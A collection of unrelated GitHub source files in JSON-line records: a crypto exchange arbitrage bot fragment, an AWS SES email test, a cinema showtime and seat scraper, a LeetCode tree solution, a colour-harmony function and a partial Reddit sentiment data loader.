{0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n if poloniex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #polo.withdraw(marketcurrency, transfer_amount, bittrex_marketcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n\n # Alt Currency 잔고 확인\n is_altcurrency_transfering = False\n if not is_altcurrency_transfering:\n try:\n bittrex_altcurrency_bal = float(bitt.getbalance(altcurrency)['Available'])\n except:\n bittrex_altcurrency_bal = 0\n try:\n poloniex_altcurrency_bal = float(polo.returnBalances()[altcurrency])\n except:\n poloniex_altcurrency_bal = 0\n total_altcurrency_bal = bittrex_altcurrency_bal + poloniex_altcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3} '.format(bittrex_altcurrency_bal, altcurrency, poloniex_altcurrency_bal, altcurrency))\n\n # Alt Currency 잔고 조정\n if bittrex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_altcurrency_bal - (total_altcurrency_bal / 2)\n #bitt.withdraw(altcurrency, transfer_amount, poloniex_altcurrency_address)\n send_message('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n if poloniex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_altcurrency_bal - (total_altcurrency_bal / 2)\n #polo.withdraw(altcurrency, transfer_amount, bittrex_altcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n\n\n# 오더북 조회\ndef getorderbook():\n # Bittrexx 오더북 조회\n #decimal.getcontext().prec = 8\n bittrex_orderbook = bitt.getorderbook(bittrex_market, 'both', 1)\n bittrex_buyorder = bittrex_orderbook['buy']\n bittrex_sellorder = bittrex_orderbook['sell']\n #print(bittrex_orderbook)\n poloniex_orderbook = polo.returnOrderBook(poloniex_market)\n poloniex_buyorder = poloniex_orderbook['bids']\n poloniex_sellorder = poloniex_orderbook['asks']\n #print(poloniex_orderbook)\n '''\n for order in bittrex_buyorder:\n print(float(order['Rate'])*1000) #내림차순\n print(\"------------------------------------------\")\n for order in poloniex_buyorder: #내림차순\n print(order[0])\n \n for order in bittrex_sellorder:\n\n print(round(decimal.Decimal(bittrex_sellorder[0]['Rate']), 8)) #오름차순\n #round(decimal.Decimal(order['Rate']), 8)\n #print(\"------------------------------------------\")\n for order in poloniex_sellorder: #오름차순\n print(decimal.Decimal(order[0]))\n \n print(util.toSatoshi(bittrex_sellorder[0]['Rate']), bittrex_sellorder[0]['Quantity'])\n print(util.toSatoshi(poloniex_buyorder[0][0]), poloniex_buyorder[0][1])\n print(util.toSatoshi(bittrex_sellorder[0]['Rate'] - float(poloniex_buyorder[0][0])))\n '''\n bittrex_current_sell = util.toSatoshi(bittrex_sellorder[0]['Rate'])\n bittrex_current_buy = util.toSatoshi(bittrex_buyorder[0]['Rate'])\n poloniex_current_sell = util.toSatoshi(poloniex_sellorder[0][0])\n poloniex_current_buy = util.toSatoshi(poloniex_buyorder[0][0])\n print('Bittrex buy:', bittrex_current_buy, marketcurrency, 'sell:', bittrex_current_sell, marketcurrency)\n print('Poloniex buy:', poloniex_current_buy, marketcurrency, 'sell:', poloniex_current_sell, marketcurrency)\n print('bitt:polo', 1 - bittrex_current_sell/poloniex_current_buy)\n print('polo:bitt', 1 - bittrex_current_sell / poloniex_current_buy)\n if poloniex_current_buy > bittrex_current_sell and 1 - bittrex_current_sell/poloniex_current_buy > spread:\n #print((1 - (bittrex_current_sell/poloniex_current_buy))*100, \"%\")\n print(u'💰 Difference : ', round((1 - (bittrex_current_sell / poloniex_current_buy)) * 100, 2), \"%\", ' / Buy at Bittrex!!')\n\n if bittrex_current_buy > poloniex_current_sell and 1 - poloniex_current_sell/bittrex_current_buy > spread:\n print(u'💰 Difference : ', round((1 - (poloniex_current_sell / bittrex_current_buy))*100, 2), \"%\", ' / Buy at Poloniex')\n\n##오더\n\n'''\nprint(polo.returnTicker())\n# Getting the BTC price for DGB\ncurrencysummary = bitt.getmarketsummary(market_bitt)\ncurrencyprice = currencysummary[0]['Last']\n#print ('The price for {0} is {1:.8f} {2}.'.format(currency, currencyprice, trade))\n\n# 전체 잔고조회\nbalances = bitt.getbalances()\nfor coin in balances:\n if coin['Balance'] == 0:\n continue\n print('{0} : {1:.8f}'.format(coin['Currency'], coin['Balance']))\n\n#dogebalance = bittApi.getbalance(currency)\n'''\n\nif __name__ == '__main__':\n #balancing()\n while True:\n try:\n getorderbook()\n time.sleep(10)\n except:\n print(\"⚠️ Bot paused during 1 min -\", sys.exc_info())\n time.sleep(60*1)\n print(\"🔆 Bot resumed\")\n","repo_name":"hobbit19/Arbitrage_BOT","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69922697691","text":"from unittest import mock\n\nimport botocore.session\nfrom botocore.stub import Stubber\nfrom django.conf import settings\n\nimport project.apps.api.tasks\nfrom project.apps.api.tasks import send_email\n\n\ndef test_send_email(monkeypatch):\n email = \"user@example.com\"\n\n monkeypatch.setattr(settings, \"AWS_SES_EMAIL_SOURCE\", email)\n monkeypatch.setattr(settings, \"AWS_SES_REGION\", \"default\")\n\n ses_client = botocore.session.get_session().create_client(\n \"ses\", region_name=settings.AWS_SES_REGION\n )\n stubber = Stubber(ses_client)\n\n def client_mock(a, **kwargs):\n return ses_client\n\n boto3_mock = mock.Mock()\n boto3_mock.client = client_mock\n monkeypatch.setattr(project.apps.api.tasks, \"boto3\", boto3_mock)\n\n expected_response = {\"MessageId\": \"12345\"}\n\n subject = \"Welcoming\"\n body = \"Hi There!\"\n\n expected_args = {\n \"Source\": email,\n \"Destination\": {\"ToAddresses\": (email,)},\n \"Message\": {\n \"Subject\": {\"Data\": subject},\n \"Body\": {\"Text\": {\"Data\": body}},\n },\n }\n\n stubber.add_response(\"send_email\", expected_response, expected_args)\n stubber.activate()\n\n send_email((email,), subject=subject, body=body)\n","repo_name":"libdx/treasury","sub_path":"project/tests/integration/test_api/test_send_email.py","file_name":"test_send_email.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74349044890","text":"import time\nimport requests\nimport json\nimport logging\nimport re\nimport urllib.parse\nfrom datetime import datetime\nfrom random import randint\nfrom typing import List, Optional\nimport aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nfrom requests_html import AsyncHTMLSession\nfrom datetime import date\n\nfrom cinemas.models import Cinema, ScraperTask, ShowtimeSeats\nfrom cinemas.models import Movie as DjangoMovie\nfrom common.models import Country\n\nsession = AsyncHTMLSession()\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"./novocinemas.log\"),\n logging.StreamHandler()\n ]\n)\nMAIN_PAGE = \"https://reelcinemas.com/en-ae/\"\nTCPCONNECTOR_LIMIT = 50\nSESSION_TIMEOUT_SEC = 5200\n\nSLEEP_BEFORE_REQUESTS_SEC = 1\n# get movies for this day\nDAY = date.today().strftime('%Y-%m-%d')\n'''{\n movie : \n {mall_name : \n {\n exp : [1,2,3] - sold/empty\n }\n }\n}'''\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\"\n}\n\n\nasync def post_request(session: aiohttp.ClientSession, url: str,\n params: dict = None,\n data: dict = None,\n json: dict = None) -> Optional[str]:\n for i in range(3):\n try:\n async with session.post(url, params=params, data=data, json=json, timeout=120) as resp:\n logging.debug(f\"Loading data from {url}, params - {params}, data - {data}, json - {json}\")\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. Trying again\")\n await asyncio.sleep(randint(5, 60))\n except asyncio.TimeoutError:\n logging.error(f\"Timeout Error. Url - {url}. Trying again\")\n continue\n except Exception as e:\n await asyncio.sleep(randint(5, 60))\n logging.error(f\"Error - {e}. Url - {url}. Trying again\")\n continue\n return None\n\n\nasync def get_html(session: aiohttp.ClientSession, url: str, params: dict = None):\n if params is None:\n params = {}\n\n while True:\n async with session.get(url, params=params) as resp:\n logging.debug(f\"Loading page {url}, params - {params}\")\n try:\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. Trying again\")\n await asyncio.sleep(randint(5,30))\n except Exception as e:\n print(\"Insdie get_html execption..\")\n\n\ndef get_asp_net_cookie():\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.get(url, headers=HEADERS, verify=False)\n asp_net_cookie = response.cookies['ASP.NET_SessionId']\n return asp_net_cookie\n\n\ndef extract_url_parts(onclick): ##get the movie id and title\n pattern = r'MovieDetailsPage\\(\"(.*?)\",\"(.*?)\"\\)'\n match = re.search(pattern, onclick)\n if match:\n return match.group(1), match.group(2)\n return None, None\n\n\nasync def get_movies(session: aiohttp.ClientSession): ##get movie name and url\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = await get_html(session, url)\n # if response.status_code == 200:\n # Save the response content to a file\n # with open('/Users/n.purushottam.lagad/Downloads/reel.txt','wb') as file:\n # file.write(response.content)\n # print(f\"Downloaded the response content\")\n soup = BeautifulSoup(response, 'html.parser')\n movie_items = soup.find_all('div', {'class': 'movie-item'})\n movies = []\n for movie_item in movie_items:\n try:\n movie_title = movie_item['id']\n language = soup.find('div', class_='duration-language').find_all('span')[-1].get_text(strip=True)\n movie_id, title_dashed = extract_url_parts(\n str(movie_item)) ## movie_id = group(1) and title_dashed = group(2)\n movie_url = f\"https://reelcinemas.com/en-ae/movie-details/{movie_id}/{title_dashed}\" ##movie_id = HO00003413 & title_dashed = Fast-X-\n movies.append((movie_title, movie_url, movie_id, language))\n except:\n pass\n print(f\"movies_len : {len(movies)}\")\n return movies\n\n\ndef get_movie_session(asp_net_cookie, magic_string):\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\",\n \"Content-Type\": \"application/json\",\n \"ASP.NET_SessionId\": asp_net_cookie\n }\n # time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.post(url=url, headers=headers, data='\"' + magic_string + '\"', verify=False)\n movie_session = response.cookies['movieSession']\n return movie_session\n\n\ndef extract_num_empty(input_str):\n pattern = r'status:empty'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_num_sold(input_str):\n pattern = r'status:sold'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_experience(input_str):\n return input_str['Experience']\n # exp = input_str['cinemaConfig']\n # experience = exp['ComboSeatSelection']['Experiences'][0]\n # return experience\n\n\nasync def get_seating_info(session: aiohttp.ClientSession):\n url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n # cookies = {\n # \"ASP.NET_SessionId\": asp_net_cookie,\n # \"movieSession\": movie_session,\n # }\n response = await get_html(session, url)\n t = json.loads(response)\n experience = extract_experience(t)\n area_entity_list = t[\"Sourcedata\"][\"AreaEntityList\"]\n ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n seats_list = []\n if area_entity_list:\n for area_entity in area_entity_list:\n area_code = area_entity[\"AreaCode\"]\n area_description = area_entity[\"AreaDescription\"]\n row_entity_list = area_entity[\"rowEntityList\"]\n\n empty_count = sum(1 for row_entity in row_entity_list for seat_entity in row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Empty\")\n sold_count = sum(1 for row_entity in row_entity_list for seat_entity in row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Sold\")\n for ticket in ticket_list:\n if ticket[\"AreaCode\"] == area_code:\n price_in_aed = ticket[\"PriceInAed\"]\n print(f\"AreaCode: {area_code}, AreaDescription: {area_description}\")\n print(f\"Empty Count: {empty_count}, Sold Count: {sold_count}, {price_in_aed}\")\n seats_price = [area_description, empty_count, sold_count, experience, price_in_aed]\n print(seats_price)\n seats_list.append(seats_price)\n return seats_list\n\n\n# async def get_seating_info(session: aiohttp.ClientSession):\n# try:\n# url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n# response = await get_html(session, url)\n# t = json.loads(response)\n# experience = extract_experience(t)\n# s = response.replace('\"', '').lower()\n# num_empty = extract_num_empty(s)\n# num_sold = extract_num_sold(s)\n# ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n# ticket_descriptions = [ticket[\"TicketDescription\"] for ticket in ticket_list]\n# ticket_prices = [ticket[\"PriceInAed\"] for ticket in ticket_list]\n# return num_empty, num_sold, experience, ticket_descriptions, ticket_prices\n# except Exception as e:\n# print(\"Inside get_seating_info exception\")\n# print(e)\n\n\nasync def get_seats(showtimes):\n seats = []\n try:\n magic_string = showtimes[-2]\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n\n # In order not to work with cookies manually, we start a new session.\n # Session cookies persist throughout the session. Same functionality in the requests.Session class\n async with aiohttp.ClientSession(connector=connector, headers=HEADERS, timeout=timeout) as new_session:\n url = \"https://reelcinemas.com/en-ae/\"\n await get_html(new_session, url)\n\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n await post_request(new_session, url, json=magic_string)\n seating_info = await get_seating_info(new_session)\n\n try:\n if seating_info:\n for sp in seating_info:\n num_empty = sp[1]\n num_sold = sp[2]\n seats_area = sp[0]\n num_total = num_empty + num_sold\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}\")\n country = showtimes[0]\n movie_name = showtimes[1]\n cinema_title = showtimes[2]\n showtime = showtimes[3]\n scraping_date = showtimes[4]\n processing_date = showtimes[5]\n movie_language = showtimes[7]\n experience = sp[3]\n ticket_prices = sp[4]\n\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}--{experience}--{ticket_prices}\")\n total = [country, movie_name, cinema_title, showtime, seats_area, num_total, num_sold, experience,\n ticket_prices, scraping_date, processing_date, movie_language]\n print(total)\n seats.append(total)\n return seats\n except Exception as e:\n print(\"INSIDE INSIDE INSIDE...\")\n print(e)\n pass\n except ConnectionError:\n print(\"Connection error...\")\n print(\"break...\")\n pass\n\n\nasync def get_showtimes_by_date(session: aiohttp.ClientSession, movie, date: datetime.date, code) -> List:\n showtimes = []\n params = {\n \"movieId\": movie[2],\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"cinemas\": code\n }\n url = urllib.parse.urljoin(MAIN_PAGE, \"MovieDetails/GetMovieShowTimes\")\n response = await post_request(session, url, params=params)\n # with open('/Users/n.purushottam.lagad/Downloads/reel_show.txt','w') as file:\n # file.write(html)\n response_json = json.loads(response)\n soup = BeautifulSoup(response_json, \"lxml\")\n if \"No Schedules found\" in response:\n return []\n\n a = soup.find_all('a')\n for a_tag in a:\n if a_tag.get(\"onclick\"):\n magic_string = re.search(r'\"([^\"]*)\"', a_tag.get(\"onclick\")).group(1)\n elif a_tag.get(\"href\"):\n magic_string = a_tag.get(\"href\").split(\"','\")[6]\n else:\n raise ValueError(\"Showtime parsing error. Unexpected html\")\n\n showtime = a_tag.find('div', class_='showtime').text\n print('magic_string:', magic_string)\n print('showtime:', showtime)\n print('---')\n # time_obj = datetime.strptime(time_a, \"%I:%M %p\").time()\n # url = urllib.parse.urljoin(MAIN_PAGE, time_a.get(\"href\"))\n # datetime_obj = datetime.combine(date, time_obj)\n movie_name = movie[0]\n movie_language = movie[3]\n if params['cinemas'] == '0001':\n cinema_title = 'The Dubai Mall'\n if params['cinemas'] == '0002':\n cinema_title = 'Dubai Marina Mall'\n if params['cinemas'] == '0006':\n cinema_title = 'The Springs Souk'\n print(f\"{movie_name}--{cinema_title}--{showtime}\")\n country = MAIN_PAGE.split(\"/\")[3]\n current_date = date.today()\n scraping_date = datetime.now().strftime('%Y%m%d %H:%M')\n processing_date = current_date.strftime(\"%Y%m%d\")\n\n total = [country, movie_name, cinema_title, showtime, scraping_date, processing_date,\n magic_string, movie_language]\n print(total)\n showtimes.append(total)\n return showtimes\n\n\nasync def get_movie_showtimes(session: aiohttp.ClientSession, movie, query_date_str: str):\n movie_html = await get_html(session, movie[1])\n # with open('/Users/n.purushottam.lagad/Downloads/reel_movie_show.txt','w') as file:\n # file.write(movie_html)\n soup = BeautifulSoup(movie_html, \"lxml\")\n # language_id = soup.find(\"input\", {\"id\": \"SelectedLanguageId\"}).get(\"value\")\n # movie = movie._replace(language_id=language_id)\n\n available_date_items = soup.findAll(\"div\", class_=\"dboxelement\")\n showtimes = []\n cinema_code = ['0001', '0002', '0006']\n for date_item in available_date_items:\n date_str = date_item.get('id')\n if date_str != query_date_str:\n continue\n date_obj = datetime.strptime(date_str, \"%Y-%m-%d\").date()\n for code in cinema_code:\n showtimes += await get_showtimes_by_date(session, movie, date_obj, code)\n logging.info(f\"Received {len(showtimes)} showtimes for {movie[0]}\")\n return showtimes\n\n\nasync def get_all_showtimes(session: aiohttp.ClientSession,\n movies,\n date_str: str): ## create separate task for each movie to get showtimes\n tasks = []\n for movie in movies:\n task = asyncio.create_task(get_movie_showtimes(session, movie, date_str))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes.\")\n return results\n\n\nasync def get_all_seats(movie_showtimes):\n tasks = []\n for show in movie_showtimes:\n task = asyncio.create_task(get_seats(show))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes in final layer.\")\n return results\n\n\nasync def main(date_str):\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n async with aiohttp.ClientSession(connector=connector, headers=HEADERS, timeout=timeout) as session:\n # total_movies = []\n # start_time = time.time()\n # asp_net_cookie = get_asp_net_cookie()\n movies = await get_movies(session)\n movie_showtimes = await get_all_showtimes(session, movies, date_str)\n movie_seats = await get_all_seats(movie_showtimes)\n\n return movie_seats\n # df1 = pd.DataFrame(data=movie_seats,\n # columns=['country', 'movie_name', 'cinema_title', 'show_time', 'seats_area', 'seats_total',\n # 'seats_sold', 'experience', 'ticket_prices', 'scraping_date',\n # 'processing_date', 'movie_language'])\n # df1.to_csv(\"reel_final5.csv\")\n\n\ndef calling_main(date_str):\n showtimes = asyncio.new_event_loop()\n showtimes = showtimes.run_until_complete(main(date_str))\n\n\ndef save_to_django_db(task: ScraperTask):\n logging.info(f\"Start task for {task.cinema_provider.name} {task.id}\")\n search_date_str = task.date_query.strftime(\"%Y-%m-%d\")\n showtimes = asyncio.run(main(search_date_str))\n\n for showtime in showtimes:\n country, created = Country.objects.get_or_create(name=showtime[0])\n cinema, created = Cinema.objects.get_or_create(name=showtime[2], country=country)\n movie, created = DjangoMovie.objects.get_or_create(name=showtime[1], language=showtime[11])\n\n showtime_time_obj = datetime.strptime(showtime[3], '%I:%M %p')\n showtime_datetime_obj = datetime.combine(task.date_query, showtime_time_obj.time())\n ShowtimeSeats.objects.create(\n task=task,\n cinema=cinema,\n movie=movie,\n datetime=showtime_datetime_obj,\n experience=showtime[7],\n all=showtime[5],\n sold=showtime[6],\n price=showtime[8],\n area=showtime[4],\n )\n","repo_name":"LopatKing/cinema-scrapers","sub_path":"django/scrapers/reelcinema.py","file_name":"reelcinema.py","file_ext":"py","file_size_in_byte":16603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7428325483","text":"# LeetCode imports\nfrom LeetCode.GlobalStructures import TreeNode\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def maximumAverageSubtree(self, root: Optional[TreeNode]) -> float:\n '''\n Initial and Optimal\n '''\n max_avg = 0\n \n def AvgUsingDFS(node):\n nonlocal max_avg\n \n if not node:\n return 0, 0\n \n left_count, left_sum = AvgUsingDFS(node.left)\n right_count, right_sum = AvgUsingDFS(node.right)\n curr_count = left_count + 1 + right_count\n curr_sum = left_sum + node.val + right_sum\n \n max_avg = max(max_avg, curr_sum / curr_count)\n return curr_count, curr_sum\n \n AvgUsingDFS(root)\n return max_avg","repo_name":"PyroGenesis/Comprehensive-Coding-Solutions","sub_path":"LeetCode/1120-Maximum-Average-Subtree.py","file_name":"1120-Maximum-Average-Subtree.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29999432047","text":"\ndef colour_harmony(anchor, c):\n colours=[\"red\",\"red-orange\",\"orange\",\"yellow-orange\",\"yellow\",\"yellow-green\"]\n colours+=[\"green\",\"blue-green\",\"blue\",\"blue-violet\",\"violet\",\"red-violet\"]\n \n combs = {}\n combs[\"complementary\"] = [0,6]\n combs[\"analogous\"] = [0,1,-1]\n combs[\"split_complementary\"] = [0,5,-5]\n combs[\"triadic\"] = [0,4,-4]\n combs[\"rectangle\"] = [0,2,6,-4]\n combs[\"square\"] = [0,3,6,-3]\n \n r = colours.index(anchor)\n return {colours[(r+i)%12] for i in combs[c]}\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"md4AF8HwJrhrhA5zm_10.py","file_name":"md4AF8HwJrhrhA5zm_10.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1741105788","text":"## Vocab Primer\nimport os\nimport sys\nimport nltk\nfrom nltk import word_tokenize\nnltk.download('punkt')\nfrom tqdm import tqdm\nimport torch\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nfrom datetime import datetime, timedelta, date\n\n\n\nfrom scipy.sparse import csr_matrix\nimport numpy as np\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\n\nclass Vocab():\n\tdef __init__(self):\n\t\tself.locked = False\n\t\tself.nextID = 0\n\t\tself.word2id = {}\n\t\tself.id2word = {}\n\n\tdef get_id(self, word):\n\t\tif not word in self.word2id:\n\t\t\tif self.locked:\n\t\t\t\treturn -1 \t# UNK token\n\t\t\telse:\n\t\t\t\tself.word2id[word] = self.nextID\n\t\t\t\tself.id2word[self.word2id[word]] = word\n\t\t\t\tself.nextID += 1\n\t\treturn self.word2id[word]\n\n\tdef has_word(self, word):\n\t\treturn self.word2id.has_key(word)\n\n\tdef has_id(self, wid):\n\t\treturn self.word2.has_key(wid)\n\n\tdef get_word(self, wid):\n\t\treturn self.id2word[wid]\n\n\tdef save_vocab(self, vocabFile):\n\t\tfOut = open(vocabFile, 'w')\n\t\tfor word in self.word2id.keys():\n\t\t\tfOut.write(\"%s\\t%s\\n\" % (word, self.word2id[word]))\n\n\tdef get_vocab_size(self):\n\t\t#return self.nextId-1\n\t\treturn self.nextID\n\n\tdef get_words(self):\n\t\treturn self.word2id.keys()\n\n\tdef lock(self):\n\t\tself.locked = True\n\ndef create_vocab(wsb_data):\n vocab = Vocab()\n for item in wsb_data:\n tokenized_item = word_tokenize(item)\n for word in tokenized_item:\n id = vocab.get_id(word.lower())\n vocab.lock()\n return vocab\n\ndef load_csv(csv_file_path, type_=None):\n\tif type_ == \"reddit\" or type_ == None:\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\t\tdata = data[[\"title\", \"score\", \"comms_num\", \"timestamp\"]]\n\n\tif type_ == \"twitter\":\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\n\treturn data\n\n\nclass WSBData():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\t\tself.lowest_bound = -999999\n\t\tself.get_stats_wsb()\n\n\t\t# if train:\n\t\t# \tdataframe = dataframe.iloc[rows//4:, :]\n\t\t# else:\n\t\t# \tdataframe = dataframe.iloc[:rows//4, :]\n\n\t\t#For csr_matrix (see http://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.sparse.csr_matrix.html#scipy.sparse.csr_matrix)\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(dataframe))):\n\t\t\trow = dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tsentiment_value = self.sentiment_function(row)\n\n\t\t\tif sentiment_value == \"very-bearish\":\n\t\t\t\tY.append(0)\n\t\t\telif sentiment_value == \"bearish\":\n\t\t\t\tY.append(1)\n\t\t\telif sentiment_value == \"neutral\":\n\t\t\t\tY.append(2)\n\t\t\telif sentiment_value == \"bullish\":\n\t\t\t\tY.append(3)\n\t\t\telif sentiment_value == \"very-bullish\":\n\t\t\t\tY.append(4)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef sentiment_function(self, df_row):\n\t\t# import pdb; pdb.set_trace()\n\t\tscore = df_row[1]\n\t\tcomments = df_row[2]\n\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\t\ttheta1 = 0.50\n\t\ttheta2 = 0.50\n\n\t\tsentiment = theta1*score + theta2*comments\n\t\t# import pdb; pdb.set_trace()\n\t\tbound1, bound2, bound3, bound4, bound5 = tuple(self.func_percentiles)\n\t\t# know i could have just made it return a number, but thought\n\t\t# i'd keep it string match to get a general concept across\n\t\tif sentiment >= bound1 and sentiment < bound2:\n\t\t\treturn 'bearish'\n\t\telif sentiment >= bound2 and sentiment < bound3:\n\t\t\treturn 'neutral'\n\t\telif sentiment >= bound3 and sentiment < bound4:\n\t\t\treturn 'bullish'\n\t\telif sentiment >= bound4 and sentiment < bound5:\n\t\t\treturn 'very-bullish'\n\t\telse:\n\t\t\treturn \"very-bearish\"\n\n\tdef get_stats_wsb(self, plot=False):\n\t\tscore = self.dataframe.iloc[:, 1].to_numpy()\n\t\tcomments = self.dataframe.iloc[:, 2].to_numpy()\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\n\t\ttheta1 = .50\n\t\ttheta2 = .50\n\t\tfunc = theta1 * score + theta2 * comments\n\t\tself.lowest_bound = func.min()\n\t\tprint(self.lowest_bound)\n\n\n\t\t## all pareto distributions which really shouldn't come as too\n\t\t## much of a surprise --\n\t\tif plot:\n\t\t\thist1 = plt.hist(score, bins=100, range=(0, 500))\n\t\t\thist2 = plt.hist(comments, bins=100, range=(0, 500))\n\t\t\tplt.show()\n\n\t\tscore_percentiles = []\n\t\tcomment_percentiles = []\n\t\tfunc_percentiles = []\n\t\tfor perc in range(0, 100, 20):\n\t\t\ts_perc = np.percentile(score, perc)\n\t\t\tc_perc = np.percentile(comments, perc)\n\t\t\tf_perc = np.percentile(func, 